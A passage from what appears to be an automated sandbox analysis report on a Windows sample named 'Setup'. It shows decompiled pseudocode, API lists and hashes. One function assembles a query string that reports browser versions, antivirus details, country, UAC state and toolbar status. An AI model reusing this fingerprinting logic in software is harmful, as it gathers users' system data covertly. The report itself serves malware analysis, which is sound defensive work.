	_push(E0048CC50(_t586, _t790, _t791)); // executed
	_t438 = E00484EA0(_t586, _t790, _t791); // executed
	_push(_t438);
	E00416600(_v1076 + 4,  &_v56, L"&iev=%d&ffv=%d&crv=%d&dwb=%s&dlb=%s&wbr=%d", E0047F670(_t586, _t790, _t791, 0));
	_t805 = _t802 + 0x28;
	_v8 = 0xd;
	E004176E0();
	_v8 = 0xc;
	E004224B0();
	_v8 = 2;
	E004176E0();
	_t828 =  &_v56;
	if( &_v56 == 0) {
		_v1080 = 0;
	} else {
		_v1080 =  &_v56 + 4;
	}
	E00405120( &_v84, _v1080);
	_t447 = E00482B50(_t586, _t790, _t791, _t828,  &_v512); // executed
	_t806 = _t805 + 4;
	_v1084 = _t447;
	_v1088 = _v1084;
	_v8 = 0xf;
	_v1092 = _v1088;
	_t829 = _v1092;
	if(_v1092 == 0) {
		_v1096 = 0;
	} else {
		_v1096 = _v1092 + 4;
	}
	_t449 = E00483160(_t586,  &_v544, _t790, _t791, _t829,  &_v544); // executed
	_t807 = _t806 + 4;
	_v1100 = _t449;
	_v1104 = _v1100;
	_v8 = 0x10;
	_v1108 = _v1104;
	if(_v1108 == 0) {
		_v1112 = 0;
	} else {
		_v1112 = _v1108 + 4;
	}
	_v1116 = E00409760( &_v572, L"&ibprs=", _v1112);
	_v1120 = _v1116;
                                                                                                                                                              				_v8 = 0x11;
                                                                                                                                                              				_v1124 = E004098D0( &_v600, _v1120, L"&ibprv=");
                                                                                                                                                              				_v1128 = _v1124;
                                                                                                                                                              				_v8 = 0x12;
                                                                                                                                                              				_t456 = E00409960( &_v628, _v1128, _v1096);
                                                                                                                                                              				_t810 = _t807 + 0x24;
                                                                                                                                                              				_v1132 = _t456;
                                                                                                                                                              				_v1136 = _v1132;
                                                                                                                                                              				_v8 = 0x13;
                                                                                                                                                              				E00405120( &_v84, _v1136);
                                                                                                                                                              				_v8 = 0x12;
                                                                                                                                                              				E004178C0( &_v628);
                                                                                                                                                              				_v8 = 0x11;
                                                                                                                                                              				E004178C0( &_v600);
                                                                                                                                                              				_v8 = 0x10;
                                                                                                                                                              				E004178C0( &_v572);
                                                                                                                                                              				_v8 = 0xf;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_t464 =  *0x5bde00; // 0x23a9ef8
                                                                                                                                                              				E004160E0( *((intOrPtr*)( *((intOrPtr*)( *_t464 + 0x2c))))( &_v56, 1), 0xe, 0xe);
                                                                                                                                                              				if((E00416630( &_v52) & 0x000000ff) == 0) {
                                                                                                                                                              					if( &_v56 == 0) {
                                                                                                                                                              						_v1140 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v1140 =  &_v56 + 4;
                                                                                                                                                              					}
                                                                                                                                                              					_t561 = E00409760( &_v656, L"&test=", _v1140);
                                                                                                                                                              					_t810 = _t810 + 0xc;
                                                                                                                                                              					_v1144 = _t561;
                                                                                                                                                              					_v1148 = _v1144;
                                                                                                                                                              					_v8 = 0x14;
                                                                                                                                                              					E00405120( &_v84, _v1148);
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E004178C0( &_v656);
                                                                                                                                                              				}
                                                                                                                                                              				_push(E00494AF0());
                                                                                                                                                              				_t747 =  *0x5bdd3c; // 0xff676980
                                                                                                                                                              				_push(_t747);
                                                                                                                                                              				_push(E00423BE0(E00404820()) & 0x0000ffff);
                                                                                                                                                              				_push(E004D4C10(E00404820()));
                                                                                                                                                              				_t646 =  *0x5be030; // 0x0
                                                                                                                                                              				_push(_t646);
                                                                                                                                                              				_t748 =  *0x5bdd2c; // 0x42
                                                                                                                                                              				_push(_t748);
                                                                                                                                                              				_t475 =  *0x5bb6b8; // 0x32
                                                                                                                                                              				E00416600( &_v56,  &_v56, L"&sutp=%d&sufl=%d&tbp=%d&prver=%d&minreq=%d&dtct=%d&wvr=%d", _t475);
                                                                                                                                                              				_t811 = _t810 + 0x24;
                                                                                                                                                              				if( &_v56 == 0) {
                                                                                                                                                              					_v1152 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1152 =  &_v56 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				E00405120( &_v84, _v1152);
                                                                                                                                                              				_t478 = E004956B0(_t586,  &_v688, _t790, _t791,  &_v688); // executed
                                                                                                                                                              				_t812 = _t811 + 4;
                                                                                                                                                              				_v1156 = _t478;
                                                                                                                                                              				_v1160 = _v1156;
                                                                                                                                                              				_v8 = 0x15;
                                                                                                                                                              				E004181D0( &_v56, _v1160);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_t482 = E00416630( &_v52);
                                                                                                                                                              				_t751 = _t482 & 0x000000ff;
                                                                                                                                                              				_t834 = _t482 & 0x000000ff;
                                                                                                                                                              				if((_t482 & 0x000000ff) == 0) {
                                                                                                                                                              					E004A0280(_t586, _t751, _t790, _t791, _t834, E00416A30( &_v52),  &_v56);
                                                                                                                                                              					_t820 = _t812 + 8;
                                                                                                                                                              					if( &_v56 == 0) {
                                                                                                                                                              						_v1164 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v1164 =  &_v56 + 4;
                                                                                                                                                              					}
                                                                                                                                                              					_t555 = E00409760( &_v716, L"&avr=", _v1164);
                                                                                                                                                              					_t812 = _t820 + 0xc;
                                                                                                                                                              					_v1168 = _t555;
                                                                                                                                                              					_v1172 = _v1168;
                                                                                                                                                              					_v8 = 0x16;
                                                                                                                                                              					E00405120( &_v84, _v1172);
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E004178C0( &_v716);
                                                                                                                                                              				}
                                                                                                                                                              				_t483 = E004D7B30(_t586, _t790, _t791,  &_v748);
                                                                                                                                                              				_t813 = _t812 + 4;
                                                                                                                                                              				_v1176 = _t483;
                                                                                                                                                              				_v1180 = _v1176;
                                                                                                                                                              				_v8 = 0x17;
                                                                                                                                                              				_v1184 = _v1180;
                                                                                                                                                              				if(_v1184 == 0) {
                                                                                                                                                              					_v1188 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1188 = _v1184 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				E00405120( &_v84, _v1188);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_t488 = E004D2F80(_t586, _t790, _t791,  &_v56); // executed
                                                                                                                                                              				_t814 = _t813 + 4;
                                                                                                                                                              				if(_t488 > 0) {
                                                                                                                                                              					if( &_v56 == 0) {
                                                                                                                                                              						_v1192 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v1192 =  &_v56 + 4;
                                                                                                                                                              					}
                                                                                                                                                              					_t547 = E00409760( &_v776, L"&tbtp=", _v1192);
                                                                                                                                                              					_t814 = _t814 + 0xc;
                                                                                                                                                              					_v1196 = _t547;
                                                                                                                                                              					_v1200 = _v1196;
                                                                                                                                                              					_v8 = 0x18;
                                                                                                                                                              					E00405120( &_v84, _v1200);
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E004178C0( &_v776);
                                                                                                                                                              				}
                                                                                                                                                              				if(( *0x5bdd29 & 0x000000ff) != 0) {
                                                                                                                                                              					E004130D0( &_v84, L"&tbinst=1");
                                                                                                                                                              				}
                                                                                                                                                              				if((E004CB910(0x5be390, 0xc, 0x52, 0) & 0x000000ff) != 0) {
                                                                                                                                                              					E004130D0( &_v84, L"&notc=1");
                                                                                                                                                              				}
                                                                                                                                                              				if((E00494A70(_t586, _t791) & 0x000000ff) != 0) {
                                                                                                                                                              					E004130D0( &_v84, L"&w64=1");
                                                                                                                                                              				}
                                                                                                                                                              				if((E004CB910(0x5be390, 0xc, 0x5a, 0) & 0x000000ff) != 0) {
                                                                                                                                                              					E004130D0( &_v84, L"&noupgrd=1");
                                                                                                                                                              				}
                                                                                                                                                              				E00502490(_t586, _t790, _t791,  &_v56, 0);
                                                                                                                                                              				_t815 = _t814 + 8;
                                                                                                                                                              				if( &_v56 == 0) {
                                                                                                                                                              					_v1204 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1204 =  &_v56 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				_v1208 = E00409760( &_v804, L"&cntry=", _v1204);
                                                                                                                                                              				_v1212 = _v1208;
                                                                                                                                                              				_v8 = 0x19;
                                                                                                                                                              				E00405120( &_v84, _v1212);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004178C0( &_v804);
                                                                                                                                                              				_t500 = E004DF870(_t586, _t790, _t791,  &_v836);
                                                                                                                                                              				_t817 = _t815 + 0x10;
                                                                                                                                                              				_v1216 = _t500;
                                                                                                                                                              				_v1220 = _v1216;
                                                                                                                                                              				_v8 = 0x1a;
                                                                                                                                                              				_v1224 = _v1220;
                                                                                                                                                              				_t844 = _v1224;
                                                                                                                                                              				if(_v1224 == 0) {
                                                                                                                                                              					_v1228 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1228 = _v1224 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				E00405120( &_v84, _v1228);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004176E0(); // executed
                                                                                                                                                              				_t503 = E004953B0(_t844); // executed
                                                                                                                                                              				if((_t503 & 0x000000ff) == 0) {
                                                                                                                                                              					_v1232 = L"&uac=0";
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1232 = L"&uac=1";
                                                                                                                                                              				}
                                                                                                                                                              				_t320 =  &_v1232; // 0x536268
                                                                                                                                                              				E004130D0( &_v84,  *_t320);
                                                                                                                                                              				if(0x5be010 == 0) {
                                                                                                                                                              					_v1236 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1236 = 0x5be014;
                                                                                                                                                              				}
                                                                                                                                                              				_t507 = E00409760( &_v864, L"&osp=", _v1236);
                                                                                                                                                              				_t818 = _t817 + 0xc;
                                                                                                                                                              				_v1240 = _t507;
                                                                                                                                                              				_v1244 = _v1240;
                                                                                                                                                              				_v8 = 0x1b;
                                                                                                                                                              				E00405120( &_v84, _v1244);
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004178C0( &_v864);
                                                                                                                                                              				if((E00503F30( &_v864, 0x5be010) & 0x000000ff) != 0) {
                                                                                                                                                              					if(0x5bded8 == 0) {
                                                                                                                                                              						_v1248 = 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						_v1248 = 0x5bdedc;
                                                                                                                                                              					}
                                                                                                                                                              					_t534 = E00409760( &_v892, L"&gloss=", _v1248);
                                                                                                                                                              					_t818 = _t818 + 0xc;
                                                                                                                                                              					_v1252 = _t534;
                                                                                                                                                              					_v1256 = _v1252;
                                                                                                                                                              					_v8 = 0x1c;
                                                                                                                                                              					E00405120( &_v84, _v1256);
                                                                                                                                                              					_v8 = 2;
                                                                                                                                                              					E004178C0( &_v892);
                                                                                                                                                              				}
                                                                                                                                                              				_t512 = E00423810(0x5bded8);
                                                                                                                                                              				_t849 = _t512 & 0x000000ff;
                                                                                                                                                              				if((_t512 & 0x000000ff) != 0) {
                                                                                                                                                              					_t531 = E004240A0();
                                                                                                                                                              					E004130A0(_t586, E004130A0(_t586,  &_v84, _t790, _t791, L"&voices="), _t790, _t791, _t531);
                                                                                                                                                              				}
                                                                                                                                                              				E004E7A30( &_v20);
                                                                                                                                                              				_v8 = 0x1d;
                                                                                                                                                              				_t515 = E004E7A50(_t586,  &_v20, _t790, _t791, _t849,  &_v924); // executed
                                                                                                                                                              				_v1260 = _t515;
                                                                                                                                                              				_v1264 = _v1260;
                                                                                                                                                              				_v8 = 0x1e;
                                                                                                                                                              				_v1268 = _v1264;
                                                                                                                                                              				if(_v1268 == 0) {
                                                                                                                                                              					_v1272 = 0;
                                                                                                                                                              				} else {
                                                                                                                                                              					_v1272 = _v1268 + 4;
                                                                                                                                                              				}
                                                                                                                                                              				_v1276 = E00409760( &_v952, L"&dnt=", _v1272);
                                                                                                                                                              				_v1280 = _v1276;
                                                                                                                                                              				_v8 = 0x1f;
                                                                                                                                                              				E00405120( &_v84, _v1280);
                                                                                                                                                              				_v8 = 0x1e;
                                                                                                                                                              				E004178C0( &_v952);
                                                                                                                                                              				_v8 = 0x1d;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				E00417660(_a4,  &_v88);
                                                                                                                                                              				_v956 = _v956 | 0x00000001;
                                                                                                                                                              				_v8 = 2;
                                                                                                                                                              				E004E7A10( &_v20);
                                                                                                                                                              				_v8 = 1;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				E004176E0();
                                                                                                                                                              				_t383 =  &_a4; // 0x4e272f
                                                                                                                                                              				 *[fs:0x0] = _v16;
                                                                                                                                                              				return E0044F6C8( *_t383, _t586, _v24 ^ _t792,  &_v88, _t790, _t791);
                                                                                                                                                              			}

                                                                                                                                                              0x004e0466
                                                                                                                                                              0x004e0475
                                                                                                                                                              0x004e047b
                                                                                                                                                              0x004e047c
                                                                                                                                                              0x004e0481
                                                                                                                                                              0x004e0496
                                                                                                                                                              0x004e049b
                                                                                                                                                              0x004e049e
                                                                                                                                                              0x004e04a8
                                                                                                                                                              0x004e04ad
                                                                                                                                                              0x004e04b7
                                                                                                                                                              0x004e04bc
                                                                                                                                                              0x004e04c6
                                                                                                                                                              0x004e04ce
                                                                                                                                                              0x004e04d0
                                                                                                                                                              0x004e04e0
                                                                                                                                                              0x004e04d2
                                                                                                                                                              0x004e04d8
                                                                                                                                                              0x004e04d8
                                                                                                                                                              0x004e04f4
                                                                                                                                                              0x004e0500
                                                                                                                                                              0x004e0505
                                                                                                                                                              0x004e0508
                                                                                                                                                              0x004e0514
                                                                                                                                                              0x004e051a
                                                                                                                                                              0x004e0524
                                                                                                                                                              0x004e052a
                                                                                                                                                              0x004e0531
                                                                                                                                                              0x004e0544
                                                                                                                                                              0x004e0533
                                                                                                                                                              0x004e053c
                                                                                                                                                              0x004e053c
                                                                                                                                                              0x004e0555
                                                                                                                                                              0x004e055a
                                                                                                                                                              0x004e055d
                                                                                                                                                              0x004e0569
                                                                                                                                                              0x004e056f
                                                                                                                                                              0x004e0579
                                                                                                                                                              0x004e0586
                                                                                                                                                              0x004e0599
                                                                                                                                                              0x004e0588
                                                                                                                                                              0x004e0591
                                                                                                                                                              0x004e0591
                                                                                                                                                              0x004e05be
                                                                                                                                                              0x004e05ca
                                                                                                                                                              0x004e05d0
                                                                                                                                                              0x004e05ef
                                                                                                                                                              0x004e05fb
                                                                                                                                                              0x004e0601
                                                                                                                                                              0x004e061a
                                                                                                                                                              0x004e061f
                                                                                                                                                              0x004e0622
                                                                                                                                                              0x004e062e
                                                                                                                                                              0x004e0634
                                                                                                                                                              0x004e0642
                                                                                                                                                              0x004e0647
                                                                                                                                                              0x004e0651
                                                                                                                                                              0x004e0656
                                                                                                                                                              0x004e0660
                                                                                                                                                              0x004e0665
                                                                                                                                                              0x004e066f
                                                                                                                                                              0x004e0674
                                                                                                                                                              0x004e067e
                                                                                                                                                              0x004e0683
                                                                                                                                                              0x004e068d
                                                                                                                                                              0x004e069c
                                                                                                                                                              0x004e06b0
                                                                                                                                                              0x004e06c2
                                                                                                                                                              0x004e06c9
                                                                                                                                                              0x004e06d9
                                                                                                                                                              0x004e06cb
                                                                                                                                                              0x004e06d1
                                                                                                                                                              0x004e06d1
                                                                                                                                                              0x004e06f6
                                                                                                                                                              0x004e06fb
                                                                                                                                                              0x004e06fe
                                                                                                                                                              0x004e070a
                                                                                                                                                              0x004e0710
                                                                                                                                                              0x004e071e
                                                                                                                                                              0x004e0723
                                                                                                                                                              0x004e072d
                                                                                                                                                              0x004e072d
                                                                                                                                                              0x004e0737
                                                                                                                                                              0x004e0738
                                                                                                                                                              0x004e073e
                                                                                                                                                              0x004e074e
                                                                                                                                                              0x004e075b
                                                                                                                                                              0x004e075c
                                                                                                                                                              0x004e0762
                                                                                                                                                              0x004e0763
                                                                                                                                                              0x004e0769
                                                                                                                                                              0x004e076a
                                                                                                                                                              0x004e0779
                                                                                                                                                              0x004e077e
                                                                                                                                                              0x004e0786
                                                                                                                                                              0x004e0796
                                                                                                                                                              0x004e0788
                                                                                                                                                              0x004e078e
                                                                                                                                                              0x004e078e
                                                                                                                                                              0x004e07aa
                                                                                                                                                              0x004e07b6
                                                                                                                                                              0x004e07bb
                                                                                                                                                              0x004e07be
                                                                                                                                                              0x004e07ca
                                                                                                                                                              0x004e07d0
                                                                                                                                                              0x004e07de
                                                                                                                                                              0x004e07e3
                                                                                                                                                              0x004e07ed
                                                                                                                                                              0x004e07f5
                                                                                                                                                              0x004e07fa
                                                                                                                                                              0x004e07fd
                                                                                                                                                              0x004e07ff
                                                                                                                                                              0x004e0812
                                                                                                                                                              0x004e0817
                                                                                                                                                              0x004e081f
                                                                                                                                                              0x004e082f
                                                                                                                                                              0x004e0821
                                                                                                                                                              0x004e0827
                                                                                                                                                              0x004e0827
                                                                                                                                                              0x004e084c
                                                                                                                                                              0x004e0851
                                                                                                                                                              0x004e0854
                                                                                                                                                              0x004e0860
                                                                                                                                                              0x004e0866
                                                                                                                                                              0x004e0874
                                                                                                                                                              0x004e0879
                                                                                                                                                              0x004e0883
                                                                                                                                                              0x004e0883
                                                                                                                                                              0x004e088f
                                                                                                                                                              0x004e0894
                                                                                                                                                              0x004e0897
                                                                                                                                                              0x004e08a3
                                                                                                                                                              0x004e08a9
                                                                                                                                                              0x004e08b3
                                                                                                                                                              0x004e08c0
                                                                                                                                                              0x004e08d3
                                                                                                                                                              0x004e08c2
                                                                                                                                                              0x004e08cb
                                                                                                                                                              0x004e08cb
                                                                                                                                                              0x004e08e7
                                                                                                                                                              0x004e08ec
                                                                                                                                                              0x004e08f6
                                                                                                                                                              0x004e08ff
                                                                                                                                                              0x004e0904
                                                                                                                                                              0x004e0909
                                                                                                                                                              0x004e0910
                                                                                                                                                              0x004e0920
                                                                                                                                                              0x004e0912
                                                                                                                                                              0x004e0918
                                                                                                                                                              0x004e0918
                                                                                                                                                              0x004e093d
                                                                                                                                                              0x004e0942
                                                                                                                                                              0x004e0945
                                                                                                                                                              0x004e0951
                                                                                                                                                              0x004e0957
                                                                                                                                                              0x004e0965
                                                                                                                                                              0x004e096a
                                                                                                                                                              0x004e0974
                                                                                                                                                              0x004e0974
                                                                                                                                                              0x004e0982
                                                                                                                                                              0x004e098c
                                                                                                                                                              0x004e098c
                                                                                                                                                              0x004e09a6
                                                                                                                                                              0x004e09b0
                                                                                                                                                              0x004e09b0
                                                                                                                                                              0x004e09bf

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E016D
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E027F
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(00000000,&sufn=,00000000,?,?,?,?,&moldid=,00000000,?,?,?,?,?), ref: 004E0371
                                                                                                                                                                • Part of subcall function 00484EA0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00484F0F
                                                                                                                                                                • Part of subcall function 00484EA0: _memset.LIBCMT ref: 00484F43
                                                                                                                                                                • Part of subcall function 00484EA0: __wcstoi64.LIBCMT ref: 00484F6F
                                                                                                                                                                • Part of subcall function 0047F670: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0047F6A8
                                                                                                                                                                • Part of subcall function 0047F670: _memset.LIBCMT ref: 0047F6DE
                                                                                                                                                                • Part of subcall function 0047F670: _swscanf.LIBCMT ref: 0047F743
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E073F
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E074F
                                                                                                                                                                • Part of subcall function 00502490: GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000008,DDD124F9,?,00000000,00508795,000000FF,?,004E09FD,?,00000000,0000000C,0000005A,00000000), ref: 005024F3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$Iterator_baseIterator_base::__memsetstd::_$FileFindInfoLocaleNamePath__wcstoi64_swscanf
                                                                                                                                                              • String ID: &avr=$&cntry=$&dnt=$&gloss=$&ibprs=$&ibprv=$&iev=%d&ffv=%d&crv=%d&dwb=%s&dlb=%s&wbr=%d$&mntrId=$&moldid=$&notc=1$&noupgrd=1$&osp=$&sufn=$&sutp=%d&sufl=%d&tbp=%d&prver=%d&minreq=%d&dtct=%d&wvr=%d$&tbinst=1$&tbtp=$&test=$&voices=$&w64=1$/'N$/'N$WBR$hbS$ver=
                                                                                                                                                              • API String ID: 327512372-716390181
                                                                                                                                                              • Opcode ID: 0d9d1d5d97aa150563532568ba6dffd530cae01ca486fc6dbeb3aa38ddd38cb6
                                                                                                                                                              • Instruction ID: 3b98f8d82bb84df878d0254f465412ed47e9ad28aab4b3b75e605d2f278c53bf
                                                                                                                                                              • Opcode Fuzzy Hash: 0d9d1d5d97aa150563532568ba6dffd530cae01ca486fc6dbeb3aa38ddd38cb6
                                                                                                                                                              • Instruction Fuzzy Hash: B2828DB0D012589BDB24EB65DD45BDEB7B4AF54308F1080EEE10967282DB786F88CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 336 424140-424154 337 424156-42415c 336->337 338 42415e-424166 GetDC 336->338 339 424169-4241c4 CreateFontW SelectObject GetTextFaceW 337->339 338->339 340 4241c6-4241cd 339->340 341 4241cf-4241d9 GetTextCharset 339->341 342 4241dc-4241e6 340->342 341->342 343 4241f6-424208 SelectObject 342->343 344 4241e8-4241f0 GetTextMetricsW 342->344 345 424216-42421d 343->345 346 42420a-424210 ReleaseDC 343->346 344->343 347 42423b-42424c DeleteObject 345->347 348 42421f-424227 345->348 346->345 351 424264-424274 call 44f6c8 347->351 349 424229-424239 StrStrIW 348->349 350 42424e-424252 348->350 349->347 349->350 350->351 352 424254-424261 call 45184a 350->352 352->351
                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00424140(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, signed int _a8, int _a12, int _a16, intOrPtr _a20, intOrPtr _a24, struct tagTEXTMETRICW* _a28) {
                                                                                                                                                              				struct HDC__* _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				short _v76;
                                                                                                                                                              				struct HFONT__* _v80;
                                                                                                                                                              				struct HWND__* _v84;
                                                                                                                                                              				void* _v88;
                                                                                                                                                              				struct HDC__* _v92;
                                                                                                                                                              				int _v96;
                                                                                                                                                              				signed int _t43;
                                                                                                                                                              				WCHAR* _t63;
                                                                                                                                                              				void* _t67;
                                                                                                                                                              				void* _t86;
                                                                                                                                                              				void* _t87;
                                                                                                                                                              				signed int _t88;
                                                                                                                                                              
                                                                                                                                                              				_t87 = __esi;
                                                                                                                                                              				_t86 = __edi;
                                                                                                                                                              				_t67 = __ebx;
                                                                                                                                                              				_t43 =  *0x561244; // 0xddd124f9
                                                                                                                                                              				_v12 = _t43 ^ _t88;
                                                                                                                                                              				if(_a20 == 0) {
                                                                                                                                                              					_v92 = GetDC(0);
                                                                                                                                                              				} else {
                                                                                                                                                              					_v92 = _a20;
                                                                                                                                                              				}
                                                                                                                                                              				_v8 = _v92;
                                                                                                                                                              				_v80 = CreateFontW(_a12, 0, 0, 0, _a16, 0, 0, 0, _a8 & 0x000000ff, 0, 0, 0, 0, _a4);
                                                                                                                                                              				_v88 = SelectObject(_v8, _v80);
                                                                                                                                                              				GetTextFaceW(_v8, 0x20,  &_v76);
                                                                                                                                                              				if((_a8 & 0x000000ff) != 0) {
                                                                                                                                                              					_v96 = GetTextCharset(_v8);
                                                                                                                                                              				} else {
                                                                                                                                                              					_v96 = 0;
                                                                                                                                                              				}
                                                                                                                                                              				_v84 = _v96;
                                                                                                                                                              				if(_a28 != 0) {
                                                                                                                                                              					GetTextMetricsW(_v8, _a28); // executed
                                                                                                                                                              				}
                                                                                                                                                              				SelectObject(_v8, _v88);
                                                                                                                                                              				if(_a20 == 0) {
                                                                                                                                                              					ReleaseDC(0, _v8);
                                                                                                                                                              				}
                                                                                                                                                              				if(_v84 != (_a8 & 0x000000ff)) {
                                                                                                                                                              					L13:
                                                                                                                                                              					_t83 = _v80;
                                                                                                                                                              					DeleteObject(_v80);
                                                                                                                                                              					_v80 = 0;
                                                                                                                                                              					goto L16;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t83 =  *_a4 & 0x0000ffff;
                                                                                                                                                              					if(( *_a4 & 0x0000ffff) == 0) {
                                                                                                                                                              						L14:
                                                                                                                                                              						if(_a24 != 0) {
                                                                                                                                                              							E0045184A(_a24,  &_v76);
                                                                                                                                                              						}
                                                                                                                                                              						L16:
                                                                                                                                                              						return E0044F6C8(_v80, _t67, _v12 ^ _t88, _t83, _t86, _t87);
                                                                                                                                                              					}
                                                                                                                                                              					_t63 = StrStrIW( &_v76, _a4); // executed
                                                                                                                                                              					if(_t63 != 0) {
                                                                                                                                                              						goto L14;
                                                                                                                                                              					}
                                                                                                                                                              					goto L13;
                                                                                                                                                              				}
                                                                                                                                                              			}


















                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 00424160
                                                                                                                                                              • CreateFontW.GDI32(0053C118,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00424194
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 004241A5
                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000020,?), ref: 004241B8
                                                                                                                                                              • GetTextCharset.GDI32(00000000), ref: 004241D3
                                                                                                                                                              • GetTextMetricsW.GDI32(00000000,00000000), ref: 004241F0
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 004241FE
                                                                                                                                                              • ReleaseDC.USER32 ref: 00424210
                                                                                                                                                              • StrStrIW.SHLWAPI(?,?), ref: 00424231
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0042423F
                                                                                                                                                              • _wcscpy.LIBCMT ref: 0042425C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ObjectText$Select$CharsetCreateDeleteFaceFontMetricsRelease_wcscpy
                                                                                                                                                              • String ID: .DB
                                                                                                                                                              • API String ID: 588102623-3243579461
                                                                                                                                                              • Opcode ID: 4ca0d98cf20631fccaf790c2c32be238378f39f3350437f1d2a6cd27e18ae94b
                                                                                                                                                              • Instruction ID: ea6a59b79ecef2f09fddcaa62a7bb6481acd72d89f002cd1ffdad0adaeb43d27
                                                                                                                                                              • Opcode Fuzzy Hash: 4ca0d98cf20631fccaf790c2c32be238378f39f3350437f1d2a6cd27e18ae94b
                                                                                                                                                              • Instruction Fuzzy Hash: A7415C74A00208EFEB14CFE4DC48BEE7BB5EF98701F10814AF919AB284D7749945DB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00433210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v16;
                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                              				char _v64;
                                                                                                                                                              				char _v92;
                                                                                                                                                              				intOrPtr _v96;
                                                                                                                                                              				signed int _t94;
                                                                                                                                                              				intOrPtr _t101;
